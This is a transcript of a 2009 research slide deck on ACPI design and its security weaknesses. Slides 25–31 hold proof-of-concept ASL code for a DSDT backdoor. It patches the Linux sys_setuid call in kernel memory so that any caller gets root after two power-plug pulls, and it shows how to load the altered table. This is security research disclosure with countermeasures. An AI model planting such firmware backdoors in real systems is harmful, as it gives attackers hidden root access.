ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a...
Transcript of ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a...
![Page 1: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/1.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
ACPI design principles and concerns
Loïc Du�ot, Olivier Levillain, Benjamin [email protected]
http://www.ssi.gouv.fr
Central Directorate for Information Systems SecuritySGDN/DCSSI 51 boulevard de la Tour Maubourg 75007 Paris
April 6th 2009
L. Du�ot, O. Levillain, B. Morin 1/37
![Page 2: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/2.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Introduction (1/3)
I Power management is a key functionality for modern computers,especially for laptops.
I Di�cult to achieve for an OS, which is a generic component.
I A few years back, APM (Advanced Power Management) enabled OSesto work with the BIOS to handle power management.
I Later on, ACPI (Advanced Con�guration Power Interface) de�nedcommon interfaces for hardware recognition and power management :
OSes can now achieve power management on their own ;Machine-dependent functions are provided by the BIOS in ACPI tables.
L. Du�ot, O. Levillain, B. Morin 2/37
![Page 3: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/3.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Introduction (2/3)
I So, ACPI is a crucial feature, present in (almost) each and everycomputer.
I But who has ever checked what ACPI tables where actually instructingoperating systems to do ?
I Can ACPI be misused by an attacker ?
I What exactly are the limits of what an attacker can do using ACPI ?
L. Du�ot, O. Levillain, B. Morin 3/37
![Page 4: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/4.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Introduction (3/3)
I Trusted Computing relies on di�erent technologies :
TPM ;Virtualisation (VT-x and Paci�ca) ;Trusted boot (TxT and Presidio).
I Technologies like TxT and Presidio, aiming at excluding the BIOS fromthe Trusted Computing Base, still need to trust ACPI tables.
L. Du�ot, O. Levillain, B. Morin 4/37
![Page 5: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/5.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Outline
1 Introduction
2 ACPI design principle
3 ACPI from a security perspective
4 Potential o�ensive uses
5 Conclusion
L. Du�ot, O. Levillain, B. Morin 5/37
![Page 6: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/6.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Outline
1 Introduction
2 ACPI design principleOverall architectureAML and ASLLinux ACPI implementation
3 ACPI from a security perspective
4 Potential o�ensive uses
5 Conclusion
L. Du�ot, O. Levillain, B. Morin 6/37
![Page 7: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/7.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Overall architecture
ACPI Overall structure(as de�ned in ACPI spec 3.0b)
Applications
OSPMDevice driver AML interpreter
Hardware
ACPI Registers ACPI BIOS ACPI Tables
Kernel
ACPI relatedcomponents
L. Du�ot, O. Levillain, B. Morin 7/37
![Page 8: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/8.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Overall architecture
ACPI Registers
Applications
OSPMDevice driver AML interpreter
Hardware
ACPI Registers ACPI BIOS ACPI Tables
Kernel
OperationRegion(LIN, PCI_Config, 0x62, 0x01)Field(LIN, ByteAcc, Nolock, Preserve){
INF,8}
I ACPI registers are chipset or con�guration registers that can be used for�something� related to Power Management.
I ACPI registers can be :
PIO registers ;Memory mapped registers ;PCI con�guration registers.
I These registers are machine-speci�c.
L. Du�ot, O. Levillain, B. Morin 8/37
![Page 9: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/9.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Overall architecture
ACPI Tables and ACPI BIOS
Applications
OSPMDevice driver AML interpreter
Hardware
ACPI Registers ACPI BIOS ACPI Tables
Kernel
Method (_STA, 0, NotSerialized){
Notify (USB0, 0x0b)If (GCUC ()){
Return (0x0f)}Else{
Return (Zero)}
}
I ACPI BIOS : part of the BIOS related to ACPI
I ACPI tables specify the border between the machine speci�c world andthe OS speci�c world :
they implement the standard ACPI interface ;they describe the ACPI structures and functions to be used by OSPM(i.e which ACPI register they use and how) ;we will focus on the DSDT (Di�erentiated System Description Table).
L. Du�ot, O. Levillain, B. Morin 9/37
![Page 10: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/10.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Overall architecture
OSPM
Applications
OSPMDevice driver AML interpreter
Hardware
ACPI Registers ACPI BIOS ACPI Tables
Kernel
OSPM stands forOS-directed con�gurationand Power Management
I OSPM is the component of the kernel responsible for the powermanagement strategy.
I It is machine-independent, and uses the ACPI common interface.
for instance OSPM knows that to check the status of the battery, it hasto run the _STA function for the BAT1 device.
I It is OS-speci�c, each OS may implement a di�erent OSPM.
I An open-source OS-independant implementation exists (ACPICA).
L. Du�ot, O. Levillain, B. Morin 10/37
![Page 11: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/11.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Overall architecture
AML Interpreter
Applications
OSPMDevice driver AML interpreter
Hardware
ACPI Registers ACPI BIOS ACPI Tables
Kernel
AML stands forACPI Machine Language
I ACPI Tables are written in AML.
I OSPM needs an AML interpreter to be able to understand ACPI tablecontent and to run methods.
I The interpreter may also be available to device drivers.
L. Du�ot, O. Levillain, B. Morin 11/37
![Page 12: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/12.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
AML and ASL
ACPI Machine and Source Languages
I ACPI tables are written in AML.
I AML can easily be
disassembled in ASL (ACPI Source Language),modi�ed andrecompiled in AML.
with ACPICA tools (iasl)
I ASL basics :
scopesdevicesnames and methodsvariables
L. Du�ot, O. Levillain, B. Morin 12/37
![Page 13: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/13.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
AML and ASL
ACPI Source Language
Devices are organised as a tree in the ACPI Languages, the leaves being themethods and the �elds.
I Devices :
_SB.VBTN : Power button_SB.PCI0 : PCI Bus_SB.PCI0.PIC0 : Legacy Interrupt Controller_SB.PCI0.USB0 : USB Host Controller
I Generic methods for devices :
_ON
_STA : device status_SxD : device states_CRS : current resource settings
I Global methods :
_PTS, _GTS, _BFS, _WAK...
L. Du�ot, O. Levillain, B. Morin 13/37
![Page 14: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/14.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
AML and ASL
ACPI Registers in ASL
I ACPI registers can be :
PCI con�guration registers ;Memory-mapped registers ;Programmed IO registers.
I They're de�ned by the OperationRegion statement :
OperationRegion(FOO, PCI_Config, Address [...])
OperationRegion(FOO, SystemIO, Address [...])
I Fields of the register can be named with the Field statement.
L. Du�ot, O. Levillain, B. Morin 14/37
![Page 15: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/15.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
AML and ASL
Exemple of ACPI Registers
OperationRegion (SMIR, SystemIO, 0xb2, 0x02)
Field (SMIR, ByteAcc, NoLock, Preserve)
{
SMIC, 8,
SMID, 8
}
OperationRegion (UPC1, PCI_Config, 0xC1, One)
Field (UPC1, ByteAcc, NoLock, Preserve)
{
LEGK, 8
}
L. Du�ot, O. Levillain, B. Morin 15/37
![Page 16: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/16.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Linux ACPI implementation
Linux ACPI implementation
I ACPI support in the kernel
DSDT in /proc or /sys (depending on the kernel version)Modular support for various devices (Battery, fan, button, dock, etc.)
I ACPI daemon (acpid)
Catches �notify� events from the kernel
Method(_INI, 0, NotSerialized)
{ Notify(\_SB.VBTN, 0x0A) }
Runs prede�ned scripts in /etc/acpi/events/ directory
event=button/power
action=/sbin/poweroff
L. Du�ot, O. Levillain, B. Morin 16/37
![Page 17: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/17.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Outline
1 Introduction
2 ACPI design principle
3 ACPI from a security perspective
4 Potential o�ensive uses
5 Conclusion
L. Du�ot, O. Levillain, B. Morin 17/37
![Page 18: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/18.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Security Model
I Most ACPI code runs in kernel mode (AML parser for instance) :
ACPI code needs to run with high privileges as it is used to con�gurehardware.
I The OS needs to trust the AML code it is given :
This AML code is de�ned in the ACPI tables by the manufacturer of theplatform ;The OS is generic and cannot identify all the valid ACPI registers.
I The chipset cannot di�erentiate hardware accesses corresponding toACPI and those not corresponding to ACPI.
L. Du�ot, O. Levillain, B. Morin 18/37
![Page 19: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/19.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Con�dence in ACPI Code
If we try to disassemble AML code and re-assemble it, errors may occur.
L. Du�ot, O. Levillain, B. Morin 19/37
![Page 20: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/20.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Function �pro�ling�
I Di�erent ways to �nd when methods are called :
analyse in depth ACPI documentation and Linux ACPI code ;enable ACPI logging and debug messages ;patch the kernel to detect all accesses to hardware ressources.
I ACPI accesses are very easy to track.
I Interesting ACPI methods may be :
those executed at startup ;those frequently called ;those triggered by external event.
L. Du�ot, O. Levillain, B. Morin 20/37
![Page 21: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/21.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Testing ACPI : modifying DSDT
Once the interesting are identi�ed and instrumented, there are several waysto load a modi�ed DSDT instead of the one provided by the BIOS :
I DSDT �le can be included in a initrd :mkinitrd �dsdt=dsdt.aml initrd.gz 2.6.17-5
I Recent versions of Linux allow for insertion of a custom DSDT at kernelcompile time.
I Some functions may also be added without a reboot
the LOAD AML statement allow for creating a new object (but not arede�nition) ;the original DSDT might provide an update mechanism using LOAD.
L. Du�ot, O. Levillain, B. Morin 21/37
![Page 22: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/22.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Is there a limit to ACPI registers that can bede�ned ?
# cat /proc/iomem[...]00100000-1f6d33ff : System RAM
00100000-002ba4aa : Kernel code002ba4ab-0037661f : Kernel data003bc000-0041f57f : Kernel bss
[...]
An accepted OperationRegion :
OperationRegion (KERN, SystemMemory, 0x100000, 0x0c)Field (KERN, WordAcc, NoLock, Preserve){
__F1, 16,__F2, 16,__F3, 16,__F4, 16,__F5, 16,__F6, 16
}
L. Du�ot, O. Levillain, B. Morin 22/37
![Page 23: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/23.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Outline
1 Introduction
2 ACPI design principle
3 ACPI from a security perspective
4 Potential o�ensive usesAttack descriptionDemonstrationAnalysis
5 Conclusion
L. Du�ot, O. Levillain, B. Morin 23/37
![Page 24: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/24.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Potential o�ensive uses
I Bugs in the DSDT might be exploitable by attackers :
an attacker could force execution of an AML bugged method in order togain some signi�cant advantage on the machine ;a random bug in a DSDT table will not necessarily be exploitable though.
I Rootkits could hide functions in DSDT tables
the OS has to trust the DSDT ;genuine updates of the DSDT at boot time are likely (BIOS updates) ;the attacker would make sure that the ACPI function providing rootkitfunctionalities is often run by the OS.
L. Du�ot, O. Levillain, B. Morin 24/37
![Page 25: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/25.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Attack description
Backdoor principle
I ACPI backdoor :
an external event triggers the backdoor granting maximum privileges onthe system.
I Proof of concept :
two direct pulls of the power plug trigger the backdoor ;on a Linux system, the backdoor modi�es the sys_setuid system call sothat every call to the sys_setuid grants superuser (root) privileges.
L. Du�ot, O. Levillain, B. Morin 25/37
![Page 26: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/26.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Attack description
Modi�cations of the DSDT : creation of a device
Our device (ABCD) contains a register CTR which will be used as a counter.
Scope (\_SB.PCI0){
Device (ABCD){
Name (_ADR, 0x000000000)Name (_UID, 0xca)Name (_PRW, Package (0x02){ 0x18, 0x05 })
OperationRegion(REG, PCI_Config, 0x62, 0x01)Field(REG, ByteAcc, Nolock, Preserve){
CTR, 8}
Method (_S1D, 0, NotSerialized){ Return (One) }
Method (_S3D, 0, NotSerialized){ Return (One) }
[...]}
}
L. Du�ot, O. Levillain, B. Morin 26/37
![Page 27: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/27.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Attack description
Modi�cations of the DSDT : target structurede�nition
We add another region representing the physical address of the setuidsystem call instructions we will override.
OperationRegion (SAC, SystemMemory, 0x00175c96, 0x000c)Field (SAC, AnyAcc, NoLock, Preserve){
SAC1, 32,SAC2, 32,SAC3, 32
}
L. Du�ot, O. Levillain, B. Morin 27/37
![Page 28: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/28.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Attack description
Modi�cations of the DSDT : incrementing thecounter
I When the power plug is plugged or unplugged, the _PSR method of theadapter (_ADP1 device) is executed, and handles our counter CTR.
I The sequence written means movl $0, 0x14c(%eax) in assemblylanguage.
Device (ADP1){[...]
Method (_PSR, 0, NotSerialized){
If (LEqual (\_SB.PCI0.ABCD.CTR, 0x4)){
Store(0x90900000, SAC3)Store(0x0, SAC2)Store(0x014c80c7, SAC1)
}
Increment (\_SB.PCI0.ABCD.CTR)Return (\_SB.MEM.AACS)
}
[...]}L. Du�ot, O. Levillain, B. Morin 28/37
![Page 29: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/29.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Attack description
Modi�cations of the DSDT : reinitialization of thecounter
I Regularly, we need a reset.
I We use a method that is regularly called.
Device(BAT1){[...]
Method (_STA, 1, NotSerialized){
Store(0x1 , \_SB.PCI0.ABCD.CTR)
[...]}
}
L. Du�ot, O. Levillain, B. Morin 29/37
![Page 30: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/30.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Attack description
Modi�cations of the DSDT : summary
I De�nition of a new variable CTR as a counter :
The variable is stored in an unused chipset register ;We have used a new device, but could have been done elsewhere.
I Every once in a while, the counter is reset by BAT1._SAT.
I On external stimulus (ADP1._PSR), counter is incremented.
I When counter hits a particular value, kernel memory is modi�ed.
L. Du�ot, O. Levillain, B. Morin 30/37
![Page 31: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/31.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Demonstration
Demonstration
I The DSDT has been added to the init ram disk.
I Pulling the plug twice triggers the backdoor : setuid will set everyoneroot.
I Live demo...
L. Du�ot, O. Levillain, B. Morin 31/37
![Page 32: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/32.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Analysis
What is the problem ?
I The problem is a general model problem.
I The OS cannot know what the correct ACPI registers are :
unless it understood the purpose of each and every hardwarecon�guration register ;but then why would ACPI be necessary ?so �ltering IO accesses is tough for the OS.
I On the other hand, the chipset cannot tell who is accessing registers :ACPI or device drivers ?
I Neither the CPU (OS) nor the chipset can determine what are thelegitimate ACPI accesses.
There is no policy enforcement point.
L. Du�ot, O. Levillain, B. Morin 32/37
![Page 33: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/33.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Analysis
Di�culties
I Modifying the DSDT is a highly privileged operation :
a modi�ed image of the DSDT in the kernel does not survive a reboot ;the DSDT must be modi�ed in the BIOS or at boot time.
I The scheme is mostly OS-speci�c :
the attack relies on the knowledge of the AML method call strategy ;the payload uses a relevant target structure.
L. Du�ot, O. Levillain, B. Morin 33/37
![Page 34: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/34.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Analysis
Countermeasures
I Not really convincing countermeasures :
remove ACPI support in the kernel, a really bad idea for laptops ;remove any means to load a custom DSDT and check boot sequenceintegrity ;look for bugs in the DSDT, impossible in practice ;accept the risk.
I In fact, we can avoid some attacks, as the kernel knows anover-approximation of the valid ACPI registers ; it is thus possible toenforce some (limited) control :
static analysis of the DSDT ;run AML interpreter in userland ;in a TxT system, run OSPM on a special VM.
L. Du�ot, O. Levillain, B. Morin 34/37
![Page 35: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/35.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Outline
1 Introduction
2 ACPI design principle
3 ACPI from a security perspective
4 Potential o�ensive uses
5 Conclusion
L. Du�ot, O. Levillain, B. Morin 35/37
![Page 36: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/36.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Conclusion
I ACPI is a very complex mechanism.
I ACPI code has to be trusted.
but trust in the ACPI code is di�cult to achieve.
I Hiding functions in AML methods is possible for a rootkit.
but not so interesting as modi�cations do not necessarily survive areboots.
I Flaws must be sought in the overall ACPI security model.
Where is the policy enforcement point of the model ?
L. Du�ot, O. Levillain, B. Morin 36/37
![Page 37: ACPI design principles and concerns · 2018-11-30 · IntroductionCPI design rincippleACPI from a security perspectiveotentialP o ensive usesConclusionQuestions Introduction (1/3)](https://reader034.fdocuments.net/reader034/viewer/2022042810/5f977ff0a8d2897e054d0e61/html5/thumbnails/37.jpg)
Introduction ACPI design principle ACPI from a security perspective Potential o�ensive uses Conclusion Questions
Questions
Thank you for your attention Questions ? Contact address :
L. Du�ot, O. Levillain, B. Morin 37/37